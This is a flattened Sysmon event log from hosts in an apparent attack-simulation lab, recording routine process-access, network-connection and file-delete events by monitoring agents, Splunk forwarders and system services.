12:30:54.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.244{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.243{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.226{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.226{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.226{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.192{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000018944Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:53.950{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50200-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018943Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:55.515{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA808807371EEBF1A10531FF55EFD804,SHA256=C0CDDC1EFFC2A909B6C3EFA5D9A5DA17D781086D2FE5437A767A20ACECE38BB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:55.985{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D60686E83AB7B00F523A424D630654F0,SHA256=FC7EB8C00C2EA149B603177C4BD92A43DB08CBE9BE0E97B9D03713480D259991,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:55.383{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000048577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:55.013{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBE45DBAF065FFC33C82E7D4B97EC228,SHA256=3851AA56C57A3B75A758320F8C192E6A68E29C7ED0866734F62222B1AA14FB2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018945Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:56.620{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B33D7491C050EB9E93973AD629303E08,SHA256=F4F8A45D005F66F31C33A2C7373AC48C4261E185E42884E463DB3BBD980A6102,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.400{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56507-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000048596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.400{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56507-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 10341000x800000000000000048595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.482{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.480{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.478{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.475{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.473{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.471{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.469{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.463{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.451{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.447{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.443{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.439{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.437{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.434{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.432{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000048580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:56.112{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89B55032F2AE35C5119EBDF57C56E6F6,SHA256=94ECB1652C54902ECF63606C1CB9101FF5566A3EC4BB13972F08B3D2DC745BC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018946Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:57.716{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C16C0032072CD465EF43D31EFC100F13,SHA256=C2F1F28F86C3AA97B84D3E9FA7F596BFD59CA0B8C12DDABEB3861A5B4770B9CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:55.727{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56508-false10.0.1.12-8000- 23542300x800000000000000048598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:57.128{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E8CDEB643B52439A665BB0F7BE483BB,SHA256=C12717F07222D053DB2AD946CF5BC6D83916D754889ECB1EBD882393E1A60128,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018947Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:58.832{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT 